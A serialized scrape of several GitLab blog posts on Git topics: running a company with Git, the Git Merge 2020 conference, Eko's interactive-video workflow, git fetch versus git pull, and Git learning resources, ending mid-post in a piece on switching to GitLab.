It can help you run your entire business – here's how we do it.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679971/Blog/Hero%20Images/git-blockchain.jpg","https://about.gitlab.com/blog/git-for-business-processes","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How we use Git as the blockchain for process changes\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Aricka Flowers\"}],\n        \"datePublished\": \"2019-01-15\",\n      }",{"title":2064,"description":2065,"authors":2070,"heroImage":2066,"date":2072,"body":2073,"category":2074,"tags":2075},[2071],"Aricka Flowers","2019-01-15","\n\nGit may have started out as a way to collaborate on code, but there’s no denying that it has crept into the operations side of things. But does it stop there? We don’t think so.\n\nJust like [blockchain technology](https://blockgeeks.com/guides/what-is-blockchain-technology/) was originally created for cryptocurrency, but is now seen as a revolutionary way to share, store and update [all kinds of data](https://www.fool.com/investing/2018/04/11/20-real-world-uses-for-blockchain-technology.aspx), we see – and use – Git in much the same way.\n\nIn addition to version controlling code and the environment in which it lives, Git can also be used at a high level to facilitate the way a company actually functions, according to our CEO [Sid Sijbrandij](/company/team/#sytses).\n\nHe says GitLab is a prime example of how it can be done.\n\n## How we use Git to run GitLab, the company\n\n\"We’re not just trying to version our code and operations, we're also trying to version all the processes we have at the company, and we do that for a whole slew of reasons,\" says Sid. \"If you write your processes down, it's easier to change and for someone to propose a change. If it's all stored in people's heads, how are you going to change it? 
You'll have to create a presentation and make sure everyone reads it. But if it’s written down, it's faster to make a change and you're better able to communicate the context for it.\"\n\n### How Git has helped us to scale\n\nUsing Git to implement procedural changes within the company has helped GitLab shoulder growing pains, thanks to our [handbook](/handbook/).\n\n\"Although we're not a perfect company by any means, we've been able to scale really rapidly, onboard people and get them started with the work they have to do,\" Sid says. \"And I think our handbook and how we describe things is an important part of that. It's exciting to see it grow. The handbook is now over 2,000 pages, so people can't read everything anymore, but they can read the parts that are relevant to them, and it's really helping with organizational changes that are happening between different departments.\"\n\nSid admits running a business with Git collaboration can seem like a daunting task, especially for companies that did not start out functioning that way. But he urges business leaders to give the process a chance, pointing to a number of companies that are adopting Git as a way to make procedural changes, including O’Reilly Media and several law firms.\n\n## Two tips for adopting Git to run your business\n\n### 1. Evangelize from the top down\n\n\"First of all, this is super hard. It's unnatural and it requires constant campaigning from the top of the company,\" Sid said. \"The natural state is for all the documentation to get out of date, and for people to send each other emails and PowerPoints about the change they want to make without looking at the rest of the changes.\"\n\n### 2. Make processes easier to change\n\n\"What you frequently find in companies is that there's the official process, and then the process that people really use. You can prevent that by making processes easier to change. 
The reality is people are changing processes in a company every single day, and they have to make those changes quickly. So the harder you make it, the more diversions there will be between reality and what's in the handbook. Instead, empower everyone in the organization to make those changes and do so quickly. That is one of the most important things you can do.\"\n\n\"Our handbook is [Creative Commons](https://creativecommons.org/licenses/by-sa/4.0/), so feel free to use that as a starting point for anything that you do.\" [Tweet us](http://twitter.com/gitlab) if you do borrow from or adapt our handbook – we'd love to hear about it.\n\n[Cover image](https://unsplash.com/photos/mf-o1E7omzk) by [chuttersnap](https://unsplash.com/@chuttersnap) on Unsplash\n{: .note}\n","culture",[779,751,803,9,686],{"slug":2077,"featured":6,"template":689},"git-for-business-processes","content:en-us:blog:git-for-business-processes.yml","Git For Business Processes","en-us/blog/git-for-business-processes.yml","en-us/blog/git-for-business-processes",{"_path":2083,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2084,"content":2090,"config":2095,"_id":2097,"_type":14,"title":2098,"_source":16,"_file":2099,"_stem":2100,"_extension":19},"/en-us/blog/git-merge-fifteen-year-git-party",{"title":2085,"description":2086,"ogTitle":2085,"ogDescription":2086,"noIndex":6,"ogImage":2087,"ogUrl":2088,"ogSiteName":673,"ogType":674,"canonicalUrls":2088,"schema":2089},"Git Merge 2020: a celebration of Git","A look at Git Merge 2020 and a look forward to the next decade of remote, async, and powerful source code management.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681154/Blog/Hero%20Images/GitLab-sponsoring-Git-Merge.jpg","https://about.gitlab.com/blog/git-merge-fifteen-year-git-party","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Git Merge 2020: a celebration of Git\",\n        \"author\": 
[{\"@type\":\"Person\",\"name\":\"Jordi Mon\"}],\n        \"datePublished\": \"2020-03-25\",\n      }",{"title":2085,"description":2086,"authors":2091,"heroImage":2087,"date":2092,"body":2093,"category":10,"tags":2094},[1392],"2020-03-25","\n\nAlmost 15 years ago [Linus Torvalds](https://www.linkedin.com/in/linustorvalds/) came out of retirement and released a project – Git – that would be adopted by millions who would in turn contribute over time to what is arguably the world's most powerful distributed version control system.\n\n![Git Merge 2020 kicking off](https://about.gitlab.com/images/blogimages/git-merge-2020/Entrance_Git_Merge.gif){: .center}\n\nIn early March, Git was celebrated at [Git Merge 2020](https://git-merge.com/#schedule/), an event that was sponsored by GitHub, GitLab and the [Software Freedom Conservancy (SFC)](https://sfconservancy.org/). A fair share of GitLab team members attended and actively participated in the birthday celebration. We thought we'd share a look at what we liked most.\n\n![Happy birthday Git](https://about.gitlab.com/images/blogimages/git-merge-2020/15_years_of_Git.jpg){: .shadow.medium.center}\n\n## Git police, stop! Open that trunk\n\nThere were lots of bad jokes like that one, but fortunately the content was much better than the jokes. Our users often say the one thing they like about GitLab is it makes Git understandable to them. It's nice to have validation every now and then and that is precisely what we felt during the talk titled **The Zen of Git** in which [Tianyu Pu](https://twitter.com/tianyupu), a software developer at Booking.com, explained in beautifully crafted slides how Git's internals work. By knowing how Git works she is able to approach Git less fearfully and be more productive using it in a day-to-day workflow. Judging by the warm round of applauses received when she finished her talk, we would argue she definitely achieved her goal. 
The clarity with which she presented each concept was encouraging so we suggest reading through [her deck](https://speakerdeck.com/tianyupu/the-zen-of-git).\n\n![Git 15 year life](https://about.gitlab.com/images/blogimages/git-merge-2020/Git_timeline.jpg){: .shadow.medium.center}\n\n[Ed Thomson](https://twitter.com/ethomson), co-maintainer of libgit2 and a GitHub employee, received some laughter from the audience the minute he was up on stage. His talk was about how lightweight, short-living branches merged fast into trunk – or master, as you wish (more terrible jokes!). He outlined great ideas to keep some sanity in your development branching model. To make this even more compelling, why not a Git workflow alignment chart?\n\n![Ed Thomson's Git workflow alignment chart](https://about.gitlab.com/images/blogimages/git-merge-2020/Git-workflow-alignment-chart.png){: .shadow.medium.center}\n\nEd suggested that pairing this pattern with [continuous delivery practices](/topics/continuous-delivery/) would make a perfect combo. Git flow, however, didn’t get the best of Ed's talk but it is noteworthy that Git flow’s author [Vincent Driessen](https://twitter.com/nvie) shared some timely advice [on his blog](https://nvie.com/posts/a-successful-git-branching-model/) while Git Merge was taking place:\n\n> If your team is doing continuous delivery of software, I would suggest to\n> adopt a much simpler workflow instead of trying to\n> shoehorn git-flow into your team.\n\nBut if there was a star that day, it certainly was [Derrick Stolee](https://twitter.com/stolee?lang=en) from Microsoft. Derrick and his team have recently released [Scalar](https://devblogs.microsoft.com/devops/introducing-scalar/). Barebones Git or Git in combination with the VFS protocol can still struggle when handling large repos like the one hosting Windows' source code. 
Scalar is an open source project aimed at accelerating Git's workflow regardless of the size of the repos.\n\nI asked Derrick how he and his team combined the request from his employer Microsoft and the larger goals of the Git community which may not be in alignment. For him the answer is simple: Microsoft thinks of Scalar as a good solution for clients and internal teams. The company believes giving Scalar to Git will only make it better since most of the community members are Git veterans and will be able to improve the feature. When designing Scalar Derrick's team always had Git's architecture in mind and the plan is to contribute it to [Git's client](https://devblogs.microsoft.com/devops/introducing-scalar/#git-future). I believe this speaks volumes about Derrick's team's ability to solve a complex problem but also at the same time care about the larger community and Git's design. This is just one example of how enterprises and the larger Git community are getting together and making Git perform better and in more use cases.\n\nAnd Scalar does not only just apply to Window's repo, Office's repo or video game repos. It is having a real-world and timely impact. This [repo](https://github.com/FoldingAtHome/coronavirus/issues/41#issuecomment-602186402) that is collecting real-time datasets to help with the COVID-19 pandemic is getting bigger every minute thanks to the input that many, including [some GitLab teams](https://about.gitlab.com/handbook/engineering/#foldinghome-and-covid-19), are offering. However, it needs technology like Scalar to handle it. 
\n\nAt the end of our chat Derrick asked me if I knew about the Japanese principle of [Ikigai](https://en.wikipedia.org/wiki/Ikigai):\n\n> Try to find something for your professional career that is fulfilling, something you are good at, something the world needs and something you'll get paid for.\n\nIt's true that contributing features to Git that are useful in such dire times must be a reason to be part of the Git community.\n\n## Work in the open: companies collaborating for the good of Git\n\nScalar isn't the only recent addition to Git – Partial Clone was contributed to Git by [Jeff Hostetler](https://twitter.com/jeffhostetler) from Microsoft and Jonathan Tan from Google. In Derrick's opinion, both of them came from different perspectives to solve the same problem. Had they not collaborated on their approach – even with the community's input – they wouldn't have arrived at the same successful feature that Partial Clone is now. Another very recent example of this same collaboration is some of the updates [Git v2.26 comes with](https://raw.githubusercontent.com/git/git/master/Documentation/RelNotes/2.26.0.txt). And [Peff](https://github.com/peff) from GitHub and [Christian Couder](https://gitlab.com/chriscool) from GitLab contributed changes to the way Git handles packfiles.\n\n## GitLab experts all over: to 15 more years!\n\nOverall we found a lot of validation in GitLab's own work, not only upstream to Git with new features like the ones already mentioned, but also downstream to our users. GitLab gets better at making Git more easily usable and proposes development workflows, like [GitLab Flow](https://docs.gitlab.com/ee/topics/gitlab_flow.html), that allow our users to be fast and productive while keeping a neat code base. GitLab is making [Partial Clone](https://about.gitlab.com/blog/partial-clone-for-massive-repositories/) progressively more stable across any GitLab instance. 
(If you are already using partial clone, or would like to help us test partial clone on a large project, please get in touch with [James Ramsay](mailto:jramsay@gitlab.com), the group manager, product for Create at GitLab, me [Jordi Mon](mailto:jmon@gitlab.com) or your account manager.)\n\n![GitLab team having fun](https://about.gitlab.com/images/blogimages/git-merge-2020/GitLab_working_together.jpg){: .shadow.medium.center}\n\nWhile our very own [James Ramsay](https://gitlab.com/jramsay) participated in an expert panel in [last year's event](https://github.blog/wp-content/uploads/2019/02/190201_GithubBrussels2019_0330.jpg?resize=1024%2C683?w=1024), this year [Zeger-Jan van de Weg](https://gitlab.com/zj-gitlab) was on stage for a stump the experts panel.\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n\u003Cblockquote class=\"twitter-tweet\">\u003Cp lang=\"en\" dir=\"ltr\">\u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a>’s \u003Ca href=\"https://twitter.com/ZJvandeWeg?ref_src=twsrc%5Etfw\">@ZJvandeWeg\u003C/a> on a stump the experts panel at \u003Ca href=\"https://twitter.com/hashtag/GitMerge?src=hash&amp;ref_src=twsrc%5Etfw\">#GitMerge\u003C/a> \u003Ca href=\"https://t.co/jfgC5ZxzWa\">pic.twitter.com/jfgC5ZxzWa\u003C/a>\u003C/p>&mdash; Ray Paik (@rspaik) \u003Ca href=\"https://twitter.com/rspaik/status/1235333465203183618?ref_src=twsrc%5Etfw\">March 4, 2020\u003C/a>\u003C/blockquote> \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n\u003Cdiv class=\"center\">\n\n\u003Cblockquote class=\"twitter-tweet\">\u003Cp lang=\"en\" dir=\"ltr\">Had a great time meeting Git community members at \u003Ca href=\"https://twitter.com/hashtag/GitMerge?src=hash&amp;ref_src=twsrc%5Etfw\">#GitMerge\u003C/a> 2020 yesterday! 
It was awesome being there as part of the \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> team and coming together with folk from \u003Ca href=\"https://twitter.com/github?ref_src=twsrc%5Etfw\">@github\u003C/a> \u003Ca href=\"https://twitter.com/Google?ref_src=twsrc%5Etfw\">@Google\u003C/a> \u003Ca href=\"https://twitter.com/conservancy?ref_src=twsrc%5Etfw\">@conservancy\u003C/a>, and many others, to collaborate and then celebrate Git’s upcoming 15th anniversary! \u003Ca href=\"https://t.co/crXr6iT5qI\">pic.twitter.com/crXr6iT5qI\u003C/a>\u003C/p>&mdash; Nuritzi Sanchez (@1nuritzi) \u003Ca href=\"https://twitter.com/1nuritzi/status/1235655639554117637?ref_src=twsrc%5Etfw\">March 5, 2020\u003C/a>\u003C/blockquote> \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\nMingling around with the rest of the community was hands down the best part of Git Merge 2020. It was so much fun to be part of a welcoming, inclusive community.\n\n![GitLab's team having fun](https://about.gitlab.com/images/blogimages/git-merge-2020/GitLab_team_chilling_out.jpg){: .shadow.medium.center}\n\nFor all these reasons and more we would love our involvement to be ever-growing with Git Merge. That's why we look forward to Git Merge 2021! 
15 years have passed and Git is still in its best moment.\n",[277,751,9],{"slug":2096,"featured":6,"template":689},"git-merge-fifteen-year-git-party","content:en-us:blog:git-merge-fifteen-year-git-party.yml","Git Merge Fifteen Year Git Party","en-us/blog/git-merge-fifteen-year-git-party.yml","en-us/blog/git-merge-fifteen-year-git-party",{"_path":2102,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2103,"content":2108,"config":2115,"_id":2117,"_type":14,"title":2118,"_source":16,"_file":2119,"_stem":2120,"_extension":19},"/en-us/blog/git-not-just-for-developers",{"title":2104,"description":2105,"ogTitle":2104,"ogDescription":2105,"noIndex":6,"ogImage":900,"ogUrl":2106,"ogSiteName":673,"ogType":674,"canonicalUrls":2106,"schema":2107},"Git: Not just for developers","How one company helps video editors, developers, and project managers to collaborate on interactive video, by leveraging the power of open source.","https://about.gitlab.com/blog/git-not-just-for-developers","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Git: Not just for developers\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Opher Vishnia\"},{\"@type\":\"Person\",\"name\":\"Roy Taragan\"}],\n        \"datePublished\": \"2018-05-24\",\n      }",{"title":2104,"description":2105,"authors":2109,"heroImage":900,"date":2112,"body":2113,"category":10,"tags":2114},[2110,2111],"Opher Vishnia","Roy Taragan","2018-05-24","\nIn this post I’d like to tell you about how, at [Eko](https://helloeko.com/), we’re using GitLab CE to allow professionals from different disciplines, such as video editors, designers, and software engineers, to collaborate on creating and publishing Interactive Video projects using the Eko platform.\n\nEko is a unique company. 
I know practically every company says that about itself, but for us that’s doubly true in that both our platform as well as our users, and our users of users, take part and actively contribute to creative, experimental ideas and technology. At the core of what we do is an exciting new medium called Interactive Video, which enhances storytelling by bridging the gap between the creator and the viewer. The projects themselves are somewhere between a TV show and a video game. These embody a range of creativity - from the [official music video for Bob Dylan’s “Like a Rolling Stone,”](https://helloeko.com/mindblown/beats-and-rhymes?publisherID=gitlab) through choose-your-own-adventure style comedies and high-caliber movie studio productions like #WarGames.\n\n[![Bob Dylan's Like a Rolling Stone video](https://about.gitlab.com/images/blogimages/eko_mind_blown.png)](https://helloeko.com/mindblown/beats-and-rhymes?publisherID=gitlab)\n\nOur development body creates all the technology for both viewing and authoring these experiences, which are created by small indies as well as big studios and production houses. At the end of the day though, all of these projects, regardless of whether they’re playing on desktop, mobile, or the Xbox, are built with web technologies and run in a browser. Each project is served as a web app, consisting of HTML, JavaScript and CSS files, as well as its video, audio and image assets.\n\nTo create these projects, Eko offers a web-based, drag-and-drop interface called Eko Studio. 
This software provides project creators with an easy interface for uploading and assembling video, connecting the different videos to each other, creating GUI to define the underlying creativity and finally publishing the finished product.\n\n![Eko Studio](https://about.gitlab.com/images/blogimages/eko-guest-post/eko-studio.png)\n\nIn cases where extra logic and functionality is required, such that isn’t yet covered by the set of features in Eko Studio, we offer the Eko SDK, which enables developers to extend the Studio’s functionality by writing their own custom JS and CSS code.\n\nThe interesting thing about the creation process of our Interactive Video projects is because of their scope and multi-disciplinary nature, different people with different roles all work on the same project at the same time. For example, a video editor might upload a new scene, a project manager would change the SEO copy and a developer might implement new GUI or functionality. One of the challenges we faced at Eko is that all of this needs to be synchronised and shared by all. The experience needs to be fluid and cohesive for all types of users, regardless of their role.\n\n![Eko Studio commits](https://about.gitlab.com/images/blogimages/eko-guest-post/eko-studio-commits.png)\n\n## Using open source to enable collaboration\n\nSo what type of software allows for multiple people to work on the same project without stepping on each other’s toes? Git, of course! With that in mind we set out to find how can we use Git as a backend that could serve our creators, developers and non-developers alike.\n\nIn Eko Studio, users can activate the feature that allows extending a project with code. Behind the scenes, the studio then employs GitLab’s API to create a new repository, generates all the code reflecting the current state of the project, and pushes it as the *initial commit*. 
From this point forward, each time a preview or published version of the project is generated, the process will begin by first pulling the latest version of the code from the repo. Using GitLab’s webhook for push events combined with Firebase, any time a commit is pushed to the repository, the user in Eko Studio is notified and the UI is updated accordingly. The user in Eko Studio can see all the commits (also fetched using the GitLab API) listed as versions, and can revert to an earlier version.\n\n>The less tech-savvy users aren’t even fully aware that by editing the project or adding content they are in fact publishing commits in the project repo\n\nThe cool thing here though, is that the Eko Studio itself acts as a Git client behind the scenes. The less tech-savvy users aren’t even fully aware that by editing the project or adding content they are in fact publishing commits in the project repo. The studio interface makes this completely transparent for them. Changes to the project made in Eko Studio are translated into Git commits in the project repo. Over on the dev side though, the software engineers use the Git interface itself using their favorite code editor and Git client.\n\n![Eko Studio code panel](https://about.gitlab.com/images/blogimages/eko-guest-post/eko-studio-code-panel.png)\n\nThe fact that GitLab is open source enabled us to custom tailor a solution for our users with minimal changes, leveraging APIs and webhooks to connect our own infrastructure. The readily available AMI meant that we can easily spool up our own GitLab CE instances without a complicated setup process. 
While our use case is very specific, the fact we’ve been able to use GitLab CE with minimal effort to implement our platform and tools for creating Interactive Video definitely highlights the flexibility and capabilities of GitLab!\n",[751,779,9],{"slug":2116,"featured":6,"template":689},"git-not-just-for-developers","content:en-us:blog:git-not-just-for-developers.yml","Git Not Just For Developers","en-us/blog/git-not-just-for-developers.yml","en-us/blog/git-not-just-for-developers",{"_path":2122,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2123,"content":2128,"config":2133,"_id":2135,"_type":14,"title":2136,"_source":16,"_file":2137,"_stem":2138,"_extension":19},"/en-us/blog/git-pull-vs-git-fetch-whats-the-difference",{"title":2124,"description":2125,"ogTitle":2124,"ogDescription":2125,"noIndex":6,"ogImage":2047,"ogUrl":2126,"ogSiteName":673,"ogType":674,"canonicalUrls":2126,"schema":2127},"Git pull vs. git fetch: What's the difference? ","Git pull is a Git command that performs both git fetch and git merge simultaneously. This article outlines the characteristics and appropriate uses of each.","https://about.gitlab.com/blog/git-pull-vs-git-fetch-whats-the-difference","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Git pull vs. git fetch: What's the difference? \",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2024-09-24\",\n      }",{"title":2124,"description":2125,"authors":2129,"heroImage":2047,"date":2130,"body":2131,"category":10,"tags":2132},[970],"2024-09-24","The Git command is very popular as a [distributed version control system](https://about.gitlab.com/topics/version-control/benefits-distributed-version-control-system/) and is used when synchronization with a remote repository is necessary. The developer needs to choose the appropriate commands based on the project's needs. 
In this article, we will explain the basics and differences between git fetch and git pull, and provide a detailed explanation of their respective use cases. \n\nTable of contents \n- [Git fetch and git pull basics](#git-fetch-and-git-pull-basics)\n- [What is git fetch?](#what-is-git-fetch%3F)\n- [What is git pull?](#what-is-git-pull%3F)\n- [When to use git fetch](#when-to-use-git-fetch)\n- [When to use git pull](#when-to-use-git-pull)\n- [Git fetch and git pull FAQs](#git-fetch-and-git-pull-faqs)\n\n## Git fetch and git pull basics \n\nGit fetch and git pull are both Git commands used to retrieve update information from a remote repository. So, how do they differ? Git fetch downloads the changes from the remote repository to the local repository but does not make any changes to the current working directory. Since the changes are not merged into the local branch, you can check the changes from the remote repository without interrupting your current work. On the other hand, git pull retrieves the latest changes from the remote repository like git fetch, but it also automatically merges those changes into the current branch. In contrast to git fetch, git pull directly applies the changes from the remote repository to the local working directory.\n\n## What is git fetch? \nThe git fetch command retrieves the latest commit history from the remote repository, but it does not affect the local working directory. Even after fetching remote changes, they are not reflected in the local branch. It is primarily used when you want to retrieve the latest status from the remote repository and review the changes before they are reflected in the local repository. To apply the retrieved changes to the local branch, you need to manually run git merge or [git rebase](https://docs.gitlab.com/ee/topics/git/git_rebase.html).\n\n## What is git pull? \nThe git pull command combines `git fetch` and `git merge` (or `git rebase`) into a single command. 
This allows you to fetch changes from the remote repository and automatically integrate them into the current local branch. \n\nWhile git fetch retrieves changes from the remote repository without applying them to the local branch, running git pull automatically integrates the changes from the remote repository into the local branch. \n\nGit pull is suitable for quickly reflecting remote changes in the local branch, but it can lead to conflicts, so caution is needed, especially when working with multiple people. \n\n## When to use git fetch \nGit fetch is a command used to retrieve the latest information from a remote repository. The retrieved information is not directly reflected in the local branch. Using git pull will reflect all remote branches, including incorrect or problematic ones, in the local branch. \n\nWhen changes are made simultaneously on both remote and local branches, or when there are new users on the team, it is safer to use git fetch to retrieve the remote branch contents first and then perform merge or rebase. \n\n## When to use git pull \nGit pull is a command that performs more processes compared to git fetch. Git pull can perform both git fetch and additionally execute git merge or git rebase. For this reason, git pull is recommended when you want to quickly reflect changes from the remote repository in the local branch. \n\n## Git fetch and git pull FAQs\n\n### What is the difference between git pull and git fetch? \nGit pull is a command that performs git fetch followed by git merge or git rebase. While git fetch does not affect the local repository, git pull automatically synchronizes changes from the remote repository with the local repository. \n\n### What precautions should be taken when using git pull? \nWhen executing git pull, there may be conflicts between remote and local changes. Merge conflicts are particularly likely to occur, so if conflicts arise, they need to be resolved manually. 
Additionally, using git pull --rebase allows you to incorporate the latest changes while performing a rebase. \n\n### What is git fetch used for? \nGit fetch is useful for checking and retrieving the latest status of the remote repository. However, the changes retrieved are not automatically reflected in the local branch; git fetch is used to synchronize the local and remote repositories. \n\n## Read more\n- [What's new in Git 2.46](https://about.gitlab.com/blog/whats-new-in-git-2-46-0/)\n- [Learn Git](https://docs.gitlab.com/ee/topics/git/)\n- [Learn about GitLab Gitaly](https://docs.gitlab.com/ee/administration/gitaly/)",[751,9],{"slug":2134,"featured":6,"template":689},"git-pull-vs-git-fetch-whats-the-difference","content:en-us:blog:git-pull-vs-git-fetch-whats-the-difference.yml","Git Pull Vs Git Fetch Whats The Difference","en-us/blog/git-pull-vs-git-fetch-whats-the-difference.yml","en-us/blog/git-pull-vs-git-fetch-whats-the-difference",{"_path":2140,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2141,"content":2147,"config":2153,"_id":2155,"_type":14,"title":2156,"_source":16,"_file":2157,"_stem":2158,"_extension":19},"/en-us/blog/git-resources-for-visual-learners",{"title":2142,"description":2143,"ogTitle":2142,"ogDescription":2143,"noIndex":6,"ogImage":2144,"ogUrl":2145,"ogSiteName":673,"ogType":674,"canonicalUrls":2145,"schema":2146},"5 Git resources for visual learners","Learning Git is not commonplace in code instruction, yet it is essential for modern software development. 
These sites get you started.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749668161/Blog/Hero%20Images/armycyberschool.jpg","https://about.gitlab.com/blog/git-resources-for-visual-learners","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"5 Git resources for visual learners\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"PJ Metz\"}],\n        \"datePublished\": \"2022-09-14\",\n      }",{"title":2142,"description":2143,"authors":2148,"heroImage":2144,"date":2150,"body":2151,"category":10,"tags":2152},[2149],"PJ Metz","2022-09-14","\n[Git](https://Git-scm.com/doc) is free and open source version control and has become the industry standard for keeping track of changes in software. A recent [survey](https://www.jetbrains.com/lp/devecosystem-2021/) by JetBrains states that 93% of developers surveyed use Git for source control.  Even though it’s used by almost every software developer, it’s still not ubiquitously taught as part of coding courses. Many people end up learning Git either on the job or on their own.\n\nWe’ve gathered a list of sites to learn Git, whether you’re brand-new to it or you need to fine-tune your skills. These five resources are largely focused on visual learning and use either video-based tools or an interactive website or game. \n\n\n**1. [Oh My Git](https://ohmyGit.org/)**\n\nOh My Git is a gamified way of learning Git commands that includes a visualization of what effect your actions have on the repository. It’s card-based for early beginners. Think of it like Hearthstone or Magic the Gathering, but better for learning. It can also be played by using the command line as well. Start playing today! \n\n**2. 
[Git for Computer Scientists](https://eagain.net/articles/git-for-computer-scientists/)**\n\nI love the abstract for this site: “Quick introduction to Git internals for people who are not scared by words like Directed Acyclic Graph.” This website has lots of helpful graphs for people who aren’t necessarily working explicitly in software, and is intended for a specific audience of computer scientists; be aware before heading in. \n\n**3. [Learn Git Branching](https://Github.com/pcottle/learnGitBranching#learnGitbranching)**\n\nSometimes, the complicated part of Git is understanding what is actually happening when you’re creating or working with multiple branches. This visualization tool helpfully creates a real-time display of changes to commit trees. \n\n**4. [Explain Git with D3](https://onlywei.github.io/explain-git-with-d3/)**\n\nThis is such a great resource and one that everyone should have bookmarked. This website lets you type commands in a CLI and immediately see graphs representing what you did on the right. It has an open playground mode where you can just do whatever you like as well as structured lessons for common Git commands. If you use Git but it just feels like magic, then this is a great website for deepening your understanding of what Git does. \n\n**5. [Git for ages 4 and up](https://youtu.be/1ffBJ4sVUb4?t=125)**\n\nThis is a fantastic video of Michael G. Schwern at Linux conf.au in 2013. Using children's toys, Michael gives us a great example of what exactly goes on in Git. It’s an entertaining video with important basics and concepts for anyone struggling to understand Git. \n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/1ffBJ4sVUb4\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## Did you know? 
\n\nGitLab offers free Ultimate tier licenses to qualifying educational institutions when used for learning, teaching, or research? Learn more [here](/solutions/education/).\n",[751,9,267],{"slug":2154,"featured":6,"template":689},"git-resources-for-visual-learners","content:en-us:blog:git-resources-for-visual-learners.yml","Git Resources For Visual Learners","en-us/blog/git-resources-for-visual-learners.yml","en-us/blog/git-resources-for-visual-learners",{"_path":2160,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2161,"content":2167,"config":2173,"_id":2175,"_type":14,"title":2176,"_source":16,"_file":2177,"_stem":2178,"_extension":19},"/en-us/blog/git-wars-switching-to-gitlab",{"title":2162,"description":2163,"ogTitle":2162,"ogDescription":2163,"noIndex":6,"ogImage":2164,"ogUrl":2165,"ogSiteName":673,"ogType":674,"canonicalUrls":2165,"schema":2166},"Git Wars: Why I'm switching to GitLab","New GitLab user Christopher Watson puts us through our paces and weighs up his Git hosting options.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680411/Blog/Hero%20Images/git-wars-switching-to-gitlab.jpg","https://about.gitlab.com/blog/git-wars-switching-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Git Wars: Why I'm switching to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Christopher Watson\"}],\n        \"datePublished\": \"2017-07-19\",\n      }",{"title":2162,"description":2163,"authors":2168,"heroImage":2164,"date":2170,"body":2171,"category":801,"tags":2172},[2169],"Christopher Watson","2017-07-19","\n\nIt’s a well-known fact: GitHub has the market share when it comes to Git hosting, with Bitbucket following close behind due to their “unlimited private repositories” policy. But what if I told you that those weren’t your only options?\n\n\u003C!-- more -->\n\nNow I have nothing against GitHub. 
It’s a great tool and I’ve been using it for years. It’s built primarily in a framework I love, Ruby on Rails, and its design is one we’ve all come to tolerate (if not love). With GitHub controlling most of the market share, most open source projects have also found a home there.\n\nAll of this being said, I’d be lying if I said that GitHub didn’t have its downsides. If you want private repositories, it’s going to cost you a pretty penny at $25 per month for your first five users, and then $9 per user after that. For comparison's sake, if you have 10 users in your organization it’s going to cost you $80 a month, and that’s a pretty small team. GitHub also has a sordid history when it comes to communicating with the community, implementing new features, and updating its somewhat dated look.\n\nBitbucket is another beast altogether. Created by the tech conglomerate Atlassian, Bitbucket is their answer to GitHub. Its claim to fame is that you can have unlimited private repositories for free…as long as your team has no more than five people.\n\nThis is actually the reason I first started using Bitbucket. However, if you do have more than five people, you’re going to pay, and the quality that you pay for isn’t all that great. I’ve worked on a number of projects on Bitbucket where my team was plagued by slow pulls/pushes, 503 errors when attempting to view a repo, and just overall jankyness. Besides that, their design also leaves a lot to be desired. The new design looks better, but also somehow makes things even more confusing (someone needs to learn the difference between UI and UX). To be completely honest I don’t have anything good to say about Bitbucket, so I’m going to continue.\n\n### So what’s this GitLab thing? Is it the answer to all of our Git hosting woes?\n\nWell yes and no. GitLab is a very good product, but it’s not perfect. It certainly isn’t as fast as GitHub when it comes to pushing and pulling repos. 
That being said, here are my reasons for switching to GitLab for my personal projects: GitLab is a Git hosting solution with a very large toolset and, objectively, a beautifully designed website (could it still use some work? Yes, but I digress). It is completely free for unlimited users, unlimited private repositories, and full access to most of the awesome features they provide.\n\nYes, they still have paid tiers for the [enterprise](/enterprise/). You can’t expect them to keep an awesome project like this going without some kind of monetization, but for us little guys you’ll most likely never have to pay. That has got to be music to your ears.\n\n### So you said it has “awesome features.” To what are you referring?\n\nWell, there’s quite a list. Let’s take a look:\n\n1. **Syntax themes!** In case you didn’t get that, I’ll say it again: syntax themes! This has been something that I have been waiting a long time for GitHub to come out with, but GitLab beat them to the punch. We’re still probably a long way away from having custom themes, but the ability to have a dark theme when checking diffs in the browser is awesome.\n\n1. **Registry:** GitLab also has a built-in Docker registry for your projects. This is an amazingly powerful feature for those that want to keep their containers off of the public registry at hub.docker.com, but don’t want to pay for a private service.\n\n1. **Pipelines/GitLab CI:** Continuous integration is a huge time saver and a great way to make sure a pull request isn’t going to break your app. GitLab saves you from having to use an external CI service by having their own CI built right in. Not to say you can’t use an external CI if you want; GitLab has integrations for Jenkins, Bamboo, and much 